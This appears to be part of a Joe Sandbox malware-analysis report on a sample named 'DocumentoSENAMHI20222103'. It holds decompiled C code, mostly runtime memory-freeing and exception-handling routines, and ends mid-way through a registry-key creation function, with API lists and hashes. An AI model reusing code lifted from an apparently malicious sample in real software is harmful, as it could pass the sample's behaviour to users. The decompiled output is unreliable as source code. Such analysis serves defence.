      • Part of subcall function 001521F6: lstrcmpiA.KERNEL32(?,00165EBC,?,00000000,00000000,001524CA,?,26A91022,?,00000000,?,?,?,0016088D,000000FF), ref: 00152209
    • _strlen.LIBCMT ref: 00152532
    • CharNextA.USER32(00000000,?,?,26A91022,?,00000000,?,?,?,0016088D,000000FF,?,00153194,?,00000000,?), ref: 001525A2
    • CharNextA.USER32(00000000,?,00153194,?,00000000,?,?,?,?,0002001F), ref: 001525B7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CharNext$_strlenlstrcmpi
    • String ID: Vv0Xv@hv$@\Dt
    • API String ID: 214070177-716746901
    • Opcode ID: a0a234c671d859ffc37e569b562ad32f16b76711fa6cca677b307728dd298745
    • Instruction ID: 7b228cfca39cdb1f2f74b43656ed39546c8870975ed58b16decd4d888130b3f2
    • Opcode Fuzzy Hash: a0a234c671d859ffc37e569b562ad32f16b76711fa6cca677b307728dd298745
    • Instruction Fuzzy Hash: 01D1B572D00268EBDB29CB64CC41AE9B7B4AF1A311F1440D9EF65AB250D7749EC9CF90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0015BFF1(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t25;
    				intOrPtr* _t26;
    				intOrPtr _t28;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    				intOrPtr* _t45;
    				intOrPtr* _t46;
    				intOrPtr* _t47;
    				intOrPtr* _t55;
    				intOrPtr* _t70;
    				intOrPtr _t74;
    
    				_t74 = _a4;
    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
    				if(_t25 != 0 && _t25 != 0x1696e8) {
    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
    					if(_t45 != 0 &&  *_t45 == 0) {
    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
    						if(_t46 != 0 &&  *_t46 == 0) {
    							E00158B82(_t46);
    							E0015BBAA( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
    						if(_t47 != 0 &&  *_t47 == 0) {
    							E00158B82(_t47);
    							E0015BCA8( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						E00158B82( *((intOrPtr*)(_t74 + 0x7c)));
    						E00158B82( *((intOrPtr*)(_t74 + 0x88)));
    					}
    				}
    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
    				if(_t26 != 0 &&  *_t26 == 0) {
    					E00158B82( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
    					E00158B82( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
    					E00158B82( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
    					E00158B82( *((intOrPtr*)(_t74 + 0x8c)));
    				}
    				E0015C162( *((intOrPtr*)(_t74 + 0x9c)));
    				_t28 = 6;
    				_t55 = _t74 + 0xa0;
    				_v8 = _t28;
    				_t70 = _t74 + 0x28;
    				do {
    					if( *((intOrPtr*)(_t70 - 8)) != 0x1691c0) {
    						_t31 =  *_t70;
    						if(_t31 != 0 &&  *_t31 == 0) {
    							E00158B82(_t31);
    							E00158B82( *_t55);
    						}
    						_t28 = _v8;
    					}
    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
    						_t29 =  *((intOrPtr*)(_t70 - 4));
    						if(_t29 != 0 &&  *_t29 == 0) {
    							E00158B82(_t29);
    						}
    						_t28 = _v8;
    					}
    					_t55 = _t55 + 4;
    					_t70 = _t70 + 0x10;
    					_t28 = _t28 - 1;
    					_v8 = _t28;
    				} while (_t28 != 0);
    				return E00158B82(_t74);
    			}
















    APIs
    • ___free_lconv_mon.LIBCMT ref: 0015C035
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BBC7
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BBD9
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BBEB
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BBFD
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC0F
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC21
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC33
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC45
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC57
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC69
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC7B
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC8D
      • Part of subcall function 0015BBAA: _free.LIBCMT ref: 0015BC9F
    • _free.LIBCMT ref: 0015C02A
      • Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
      • Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA
    • _free.LIBCMT ref: 0015C04C
    • _free.LIBCMT ref: 0015C061
    • _free.LIBCMT ref: 0015C06C
    • _free.LIBCMT ref: 0015C08E
    • _free.LIBCMT ref: 0015C0A1
    • _free.LIBCMT ref: 0015C0AF
    • _free.LIBCMT ref: 0015C0BA
    • _free.LIBCMT ref: 0015C0F2
    • _free.LIBCMT ref: 0015C0F9
    • _free.LIBCMT ref: 0015C116
    • _free.LIBCMT ref: 0015C12E
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 2504d3c439d847d7913334c6edc24774746da53eb48b8e4860e00ff00c7de0d1
    • Instruction ID: 27ad447e3fe5a498065ed2749981a60c303e2ddcc01c59a2f0c0b403a3e44a31
    • Opcode Fuzzy Hash: 2504d3c439d847d7913334c6edc24774746da53eb48b8e4860e00ff00c7de0d1
    • Instruction Fuzzy Hash: E8314A71604700DFEB20AE38D845B5673E9EF50362F148519F865EF192DF75AD88CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00158F8C(void* __ebx, void* __edi, void* __esi, char _a4) {
    				void* _v5;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* __ebp;
    				char _t55;
    				char _t61;
    				void* _t67;
    				intOrPtr _t68;
    				void* _t72;
    				void* _t73;
    
    				_t73 = __esi;
    				_t72 = __edi;
    				_t67 = __ebx;
    				_t36 = _a4;
    				_t68 =  *_a4;
    				_t77 = _t68 - 0x162040;
    				if(_t68 != 0x162040) {
    					E00158B82(_t68);
    					_t36 = _a4;
    				}
    				E00158B82( *((intOrPtr*)(_t36 + 0x3c)));
    				E00158B82( *((intOrPtr*)(_a4 + 0x30)));
    				E00158B82( *((intOrPtr*)(_a4 + 0x34)));
    				E00158B82( *((intOrPtr*)(_a4 + 0x38)));
    				E00158B82( *((intOrPtr*)(_a4 + 0x28)));
    				E00158B82( *((intOrPtr*)(_a4 + 0x2c)));
    				E00158B82( *((intOrPtr*)(_a4 + 0x40)));
    				E00158B82( *((intOrPtr*)(_a4 + 0x44)));
    				E00158B82( *((intOrPtr*)(_a4 + 0x360)));
    				_v16 =  &_a4;
    				_t55 = 5;
    				_v12 = _t55;
    				_v20 = _t55;
    				_push( &_v12);
    				_push( &_v16);
    				_push( &_v20);
    				E00158DB8(_t67, _t72, _t73, _t77);
    				_v16 =  &_a4;
    				_t61 = 4;
    				_v20 = _t61;
    				_v12 = _t61;
    				_push( &_v20);
    				_push( &_v16);
    				_push( &_v12);
    				return E00158E23(_t67, _t72, _t73, _t77);
    			}















    APIs
    • _free.LIBCMT ref: 00158FA2
      • Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
      • Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA
    • _free.LIBCMT ref: 00158FAE
    • _free.LIBCMT ref: 00158FB9
    • _free.LIBCMT ref: 00158FC4
    • _free.LIBCMT ref: 00158FCF
    • _free.LIBCMT ref: 00158FDA
    • _free.LIBCMT ref: 00158FE5
    • _free.LIBCMT ref: 00158FF0
    • _free.LIBCMT ref: 00158FFB
    • _free.LIBCMT ref: 00159009
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 7c8fe42b150a8257f8754f201f79aa91f5ef4a79730b180eb078497b54771df6
    • Instruction ID: c6a586d3597529c0adae4ff38c493be2193c40fe621b1bdcfc8d17de98603c84
    • Opcode Fuzzy Hash: 7c8fe42b150a8257f8754f201f79aa91f5ef4a79730b180eb078497b54771df6
    • Instruction Fuzzy Hash: 9B2162B6910108EFCB41EF94C881DDE7BB9FF18355F0441A6B965AF121DB31EA588F80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00156111(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
    				signed char* _v0;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				void _v64;
    				signed int _v68;
    				char _v84;
    				intOrPtr _v88;
    				signed int _v92;
    				intOrPtr _v100;
    				void _v104;
    				intOrPtr* _v112;
    				signed char* _v184;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t201;
    				signed int _t202;
    				char _t203;
    				signed int _t205;
    				signed int _t207;
    				signed char* _t208;
    				signed int _t209;
    				signed int _t210;
    				signed int _t214;
    				void* _t217;
    				signed char* _t220;
    				void* _t222;
    				void* _t224;
    				signed char _t228;
    				signed int _t229;
    				void* _t231;
    				void* _t234;
    				void* _t237;
    				signed int _t247;
    				void* _t250;
    				intOrPtr* _t251;
    				signed int _t252;
    				intOrPtr _t253;
    				signed int _t254;
    				void* _t259;
    				void* _t264;
    				void* _t265;
    				signed int _t269;
    				signed char* _t270;
    				intOrPtr* _t271;
    				signed char _t272;
    				signed int _t273;
    				signed int _t274;
    				intOrPtr* _t276;
    				signed int _t277;
    				signed int _t278;
    				signed int _t283;
    				signed int _t290;
    				signed int _t291;
    				signed int _t294;
    				signed int _t296;
    				signed char* _t297;
    				signed int _t298;
    				signed char _t299;
    				signed int* _t301;
    				signed char* _t304;
    				signed int _t314;
    				signed int _t315;
    				signed int _t317;
    				signed int _t327;
    				void* _t329;
    				void* _t331;
    				void* _t332;
    				void* _t333;
    				void* _t334;
    
    				_t296 = __edx;
    				_push(_t315);
    				_t301 = _a20;
    				_v20 = 0;
    				_v28 = 0;
    				_t275 = E0015707A(_a8, _a16, _t301);
    				_t332 = _t331 + 0xc;
    				_v12 = _t275;
    				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
    					L67:
    					_t201 = E00158A26(_t270, _t275, _t296, _t301, _t315);
    					asm("int3");
    					_t329 = _t332;
    					_t333 = _t332 - 0x38;
    					_push(_t270);
    					_t271 = _v112;
    					__eflags =  *_t271 - 0x80000003;
    					if( *_t271 == 0x80000003) {
    						return _t201;
    					} else {
    						_push(_t315);
    						_push(_t301);
    						_t202 = E00155DCC(_t271, _t275, _t296, _t301, _t315);
    						__eflags =  *(_t202 + 8);
    						if( *(_t202 + 8) != 0) {
    							__imp__EncodePointer(0);
    							_t315 = _t202;
    							_t222 = E00155DCC(_t271, _t275, _t296, 0, _t315);
    							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
    							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
    								__eflags =  *_t271 - 0xe0434f4d;
    								if( *_t271 != 0xe0434f4d) {
    									__eflags =  *_t271 - 0xe0434352;
    									if( *_t271 != 0xe0434352) {
    										_t214 = E00154F23(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
    										_t333 = _t333 + 0x1c;
    										__eflags = _t214;
    										if(_t214 != 0) {
    											L84:
    											return _t214;
    										}
    									}
    								}
    							}
    						}
    						_t203 = _a16;
    						_v28 = _t203;
    						_v24 = 0;
    						__eflags =  *(_t203 + 0xc);
    						if( *(_t203 + 0xc) > 0) {
    							_push(_a24);
    							E00154E56(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
    							_t298 = _v40;
    							_t334 = _t333 + 0x18;
    							_t214 = _v44;
    							_v20 = _t214;
    							_v12 = _t298;
    							__eflags = _t298 - _v32;
    							if(_t298 >= _v32) {
    								goto L84;
    							}
    							_t277 = _t298 * 0x14;
    							__eflags = _t277;
    							_v16 = _t277;
    							do {
    								_t278 = 5;
    								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
    								_t334 = _t334 + 0xc;
    								__eflags = _v64 - _t217;
    								if(_v64 > _t217) {
    									goto L83;
    								}
    								__eflags = _t217 - _v60;
    								if(_t217 > _v60) {
    									goto L83;
    								}
    								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
    								_t283 = _t220[4];
    								__eflags = _t283;
    								if(_t283 == 0) {
    									L81:
    									__eflags =  *_t220 & 0x00000040;
    									if(( *_t220 & 0x00000040) == 0) {
    										_push(0);
    										_push(1);
    										E00156091(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
    										_t298 = _v12;
    										_t334 = _t334 + 0x30;
    									}
    									goto L83;
    								}
    								__eflags =  *((char*)(_t283 + 8));
    								if( *((char*)(_t283 + 8)) != 0) {
    									goto L83;
    								}
    								goto L81;
    								L83:
    								_t298 = _t298 + 1;
    								_t214 = _v20;
    								_t277 = _v16 + 0x14;
    								_v12 = _t298;
    								_v16 = _t277;
    								__eflags = _t298 - _v32;
    							} while (_t298 < _v32);
    							goto L84;
    						}
    						E00158A26(_t271, _t275, _t296, 0, _t315);
    						asm("int3");
    						_push(_t329);
    						_t297 = _v184;
    						_push(_t271);
    						_push(_t315);
    						_push(0);
    						_t205 = _t297[4];
    						__eflags = _t205;
    						if(_t205 == 0) {
    							L109:
    							_t207 = 1;
    							__eflags = 1;
    						} else {
    							_t276 = _t205 + 8;
    							__eflags =  *_t276;
    							if( *_t276 == 0) {
    								goto L109;
    							} else {
    								__eflags =  *_t297 & 0x00000080;
    								_t304 = _v0;
    								if(( *_t297 & 0x00000080) == 0) {
    									L91:
    									_t272 = _t304[4];
    									_t317 = 0;
    									__eflags = _t205 - _t272;
    									if(_t205 == _t272) {
    										L101:
    										__eflags =  *_t304 & 0x00000002;
    										if(( *_t304 & 0x00000002) == 0) {
    											L103:
    											_t208 = _a4;
    											__eflags =  *_t208 & 0x00000001;
    											if(( *_t208 & 0x00000001) == 0) {
    												L105:
    												__eflags =  *_t208 & 0x00000002;
    												if(( *_t208 & 0x00000002) == 0) {
    													L107:
    													_t317 = 1;
    													__eflags = 1;
    												} else {
    													__eflags =  *_t297 & 0x00000002;
    													if(( *_t297 & 0x00000002) != 0) {
    														goto L107;
    													}
    												}
    											} else {
    												__eflags =  *_t297 & 0x00000001;
    												if(( *_t297 & 0x00000001) != 0) {
    													goto L105;
    												}
    											}
    										} else {
    											__eflags =  *_t297 & 0x00000008;
    											if(( *_t297 & 0x00000008) != 0) {
    												goto L103;
    											}
    										}
    										_t207 = _t317;
    									} else {
    										_t184 = _t272 + 8; // 0x6e
    										_t209 = _t184;
    										while(1) {
    											_t273 =  *_t276;
    											__eflags = _t273 -  *_t209;
    											if(_t273 !=  *_t209) {
    												break;
    											}
    											__eflags = _t273;
    											if(_t273 == 0) {
    												L97:
    												_t210 = _t317;
    											} else {
    												_t274 =  *((intOrPtr*)(_t276 + 1));
    												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
    												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
    													break;
    												} else {
    													_t276 = _t276 + 2;
    													_t209 = _t209 + 2;
    													__eflags = _t274;
    													if(_t274 != 0) {
    														continue;
    													} else {
    														goto L97;
    													}
    												}
    											}
    											L99:
    											__eflags = _t210;
    											if(_t210 == 0) {
    												goto L101;
    											} else {
    												_t207 = 0;
    											}
    											goto L110;
    										}
    										asm("sbb eax, eax");
    										_t210 = _t209 | 0x00000001;
    										__eflags = _t210;
    										goto L99;
    									}
    								} else {
    									__eflags =  *_t304 & 0x00000010;
    									if(( *_t304 & 0x00000010) != 0) {
    										goto L109;
    									} else {
    										goto L91;
    									}
    								}
    							}
    						}
    						L110:
    						return _t207;
    					}
    				} else {
    					_t270 = _a4;
    					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
    						L22:
    						_t296 = _a12;
    						_v8 = _t296;
    						goto L24;
    					} else {
    						_t315 = 0;
    						if(_t270[0x1c] != 0) {
    							goto L22;
    						} else {
    							_t224 = E00155DCC(_t270, _t275, _t296, _t301, 0);
    							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
    								L61:
    								return _t224;
    							} else {
    								_t270 =  *(E00155DCC(_t270, _t275, _t296, _t301, 0) + 0x10);
    								_t259 = E00155DCC(_t270, _t275, _t296, _t301, 0);
    								_v28 = 1;
    								_v8 =  *((intOrPtr*)(_t259 + 0x14));
    								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
    									goto L67;
    								} else {
    									if( *((intOrPtr*)(E00155DCC(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
    										L23:
    										_t296 = _v8;
    										_t275 = _v12;
    										L24:
    										_v52 = _t301;
    										_v48 = 0;
    										__eflags =  *_t270 - 0xe06d7363;
    										if( *_t270 != 0xe06d7363) {
    											L57:
    											__eflags = _t301[3];
    											if(_t301[3] <= 0) {
    												goto L60;
    											} else {
    												__eflags = _a24;
    												if(_a24 != 0) {
    													goto L67;
    												} else {
    													_push(_a32);
    													_push(_a28);
    													_push(_t275);
    													_push(_t301);
    													_push(_a16);
    													_push(_t296);
    													_push(_a8);
    													_push(_t270);
    													L68();
    													_t332 = _t332 + 0x20;
    													goto L60;
    												}
    											}
    										} else {
    											__eflags = _t270[0x10] - 3;
    											if(_t270[0x10] != 3) {
    												goto L57;
    											} else {
    												__eflags = _t270[0x14] - 0x19930520;
    												if(_t270[0x14] == 0x19930520) {
    													L29:
    													_t315 = _a32;
    													__eflags = _t301[3];
    													if(_t301[3] > 0) {
    														_push(_a28);
    														E00154E56(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
    														_t296 = _v64;
    														_t332 = _t332 + 0x18;
    														_t247 = _v68;
    														_v44 = _t247;
    														_v16 = _t296;
    														__eflags = _t296 - _v56;
    														if(_t296 < _v56) {
    															_t290 = _t296 * 0x14;
    															__eflags = _t290;
    															_v32 = _t290;
    															do {
    																_t291 = 5;
    																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
    																_t332 = _t332 + 0xc;
    																__eflags = _v104 - _t250;
    																if(_v104 <= _t250) {
    																	__eflags = _t250 - _v100;
    																	if(_t250 <= _v100) {
    																		_t294 = 0;
    																		_v20 = 0;
    																		__eflags = _v92;
    																		if(_v92 != 0) {
    																			_t299 = _t270[0x1c];
    																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
    																			_t252 = _t251 + 4;
    																			__eflags = _t252;
    																			_v36 = _t252;
    																			_t253 = _v88;
    																			_v40 =  *_t251;
    																			_v24 = _t253;
    																			do {
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				_t327 = _v40;
    																				_t314 = _v36;
    																				__eflags = _t327;
    																				if(_t327 <= 0) {
    																					goto L40;
    																				} else {
    																					while(1) {
    																						_push(_t299);
    																						_push( *_t314);
    																						_t254 =  &_v84;
    																						_push(_t254);
    																						L87();
    																						_t332 = _t332 + 0xc;
    																						__eflags = _t254;
    																						if(_t254 != 0) {
    																							break;
    																						}
    																						_t299 = _t270[0x1c];
    																						_t327 = _t327 - 1;
    																						_t314 = _t314 + 4;
    																						__eflags = _t327;
    																						if(_t327 > 0) {
    																							continue;
    																						} else {
    																							_t294 = _v20;
    																							_t253 = _v24;
    																							goto L40;
    																						}
    																						goto L43;
    																					}
    																					_push(_a24);
    																					_push(_v28);
    																					E00156091(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
    																					_t332 = _t332 + 0x30;
    																				}
    																				L43:
    																				_t296 = _v16;
    																				goto L44;
    																				L40:
    																				_t294 = _t294 + 1;
    																				_t253 = _t253 + 0x10;
    																				_v20 = _t294;
    																				_v24 = _t253;
    																				__eflags = _t294 - _v92;
    																			} while (_t294 != _v92);
    																			goto L43;
    																		}
    																	}
    																}
    																L44:
    																_t296 = _t296 + 1;
    																_t247 = _v44;
    																_t290 = _v32 + 0x14;
    																_v16 = _t296;
    																_v32 = _t290;
    																__eflags = _t296 - _v56;
    															} while (_t296 < _v56);
    															_t301 = _a20;
    															_t315 = _a32;
    														}
    													}
    													__eflags = _a24;
    													if(__eflags != 0) {
    														_push(1);
    														E0015536A(_t270, _t301, _t315, __eflags);
    														_t275 = _t270;
    													}
    													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
    													if(( *_t301 & 0x1fffffff) < 0x19930521) {
    														L60:
    														_t224 = E00155DCC(_t270, _t275, _t296, _t301, _t315);
    														__eflags =  *(_t224 + 0x1c);
    														if( *(_t224 + 0x1c) != 0) {
    															goto L67;
    														} else {
    															goto L61;
    														}
    													} else {
    														_t228 = _t301[8] >> 2;
    														__eflags = _t301[7];
    														if(_t301[7] != 0) {
    															__eflags = _t228 & 0x00000001;
    															if((_t228 & 0x00000001) == 0) {
    																_push(_t301[7]);
    																_t229 = E00156B26(_t270, _t301, _t315, _t270);
    																_pop(_t275);
    																__eflags = _t229;
    																if(_t229 == 0) {
    																	goto L64;
    																} else {
    																	goto L60;
    																}
    															} else {
    																goto L54;
    															}
    														} else {
    															__eflags = _t228 & 0x00000001;
    															if((_t228 & 0x00000001) == 0) {
    																goto L60;
    															} else {
    																__eflags = _a28;
    																if(_a28 != 0) {
    																	goto L60;
    																} else {
    																	L54:
    																	 *(E00155DCC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
    																	_t237 = E00155DCC(_t270, _t275, _t296, _t301, _t315);
    																	_t286 = _v8;
    																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
    																	goto L62;
    																}
    															}
    														}
    													}
    												} else {
    													__eflags = _t270[0x14] - 0x19930521;
    													if(_t270[0x14] == 0x19930521) {
    														goto L29;
    													} else {
    														__eflags = _t270[0x14] - 0x19930522;
    														if(_t270[0x14] != 0x19930522) {
    															goto L57;
    														} else {
    															goto L29;
    														}
    													}
    												}
    											}
    										}
    									} else {
    										_v16 =  *((intOrPtr*)(E00155DCC(_t270, _t275, _t296, _t301, _t315) + 0x1c));
    										_t264 = E00155DCC(_t270, _t275, _t296, _t301, _t315);
    										_push(_v16);
    										 *(_t264 + 0x1c) = _t315;
    										_t265 = E00156B26(_t270, _t301, _t315, _t270);
    										_pop(_t286);
    										if(_t265 != 0) {
    											goto L23;
    										} else {
    											_t301 = _v16;
    											_t353 =  *_t301 - _t315;
    											if( *_t301 <= _t315) {
    												L62:
    												E0015783D(_t270, _t286, _t296, _t301, _t315, __eflags);
    											} else {
    												while(1) {
    													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
    													if(E001567AF( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x292230) != 0) {
    														goto L63;
    													}
    													_t315 = _t315 + 0x10;
    													_t269 = _v20 + 1;
    													_v20 = _t269;
    													_t353 = _t269 -  *_t301;
    													if(_t269 >=  *_t301) {
    														goto L62;
    													} else {
    														continue;
    													}
    													goto L63;
    												}
    											}
    											L63:
    											_push(1);
    											_push(_t270);
    											E0015536A(_t270, _t301, _t315, __eflags);
    											_t275 =  &_v64;
    											E00156797( &_v64);
    											E00155D44( &_v64, 0x1670d4);
    											L64:
    											 *(E00155DCC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
    											_t231 = E00155DCC(_t270, _t275, _t296, _t301, _t315);
    											_t275 = _v8;
    											 *(_t231 + 0x14) = _v8;
    											__eflags = _t315;
    											if(_t315 == 0) {
    												_t315 = _a8;
    											}
    											E00155049(_t275, _t315, _t270);
    											E00156A26(_a8, _a16, _t301);
    											_t234 = E00156BE3(_t301);
    											_t332 = _t332 + 0x10;
    											_push(_t234);
    											E0015699D(_t270, _t275, _t296, _t301, _t315, __eflags);
    											goto L67;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • type_info::operator==.LIBVCRUNTIME ref: 00156230
    • ___TypeMatch.LIBVCRUNTIME ref: 0015633E
    • _UnwindNestedFrames.LIBCMT ref: 00156490
    • CallUnexpected.LIBVCRUNTIME ref: 001564AB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 2751267872-393685449
    • Opcode ID: 58fc21a9e581edf31a5922e6bdebd823e68494aeb1023141f1e445bfb067cbe6
    • Instruction ID: 70b29c0594e20dedc742907d65b82729a20e86fbd66300978f3d12df82ba80d7
    • Opcode Fuzzy Hash: 58fc21a9e581edf31a5922e6bdebd823e68494aeb1023141f1e445bfb067cbe6
    • Instruction Fuzzy Hash: D9B16A71800209EFCF24DFA4C8819AEBBB5BF54316F94415AEC256F212D731DA59CBD1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00151348(intOrPtr* __ecx, void* _a4, char* _a8, void** _a32, int* _a36) {
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t14;
    				intOrPtr* _t18;
    
    				_t18 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						L6:
    						return 1;
    					}
    					return RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x2001f, 0, _a32, _a36);
    				}
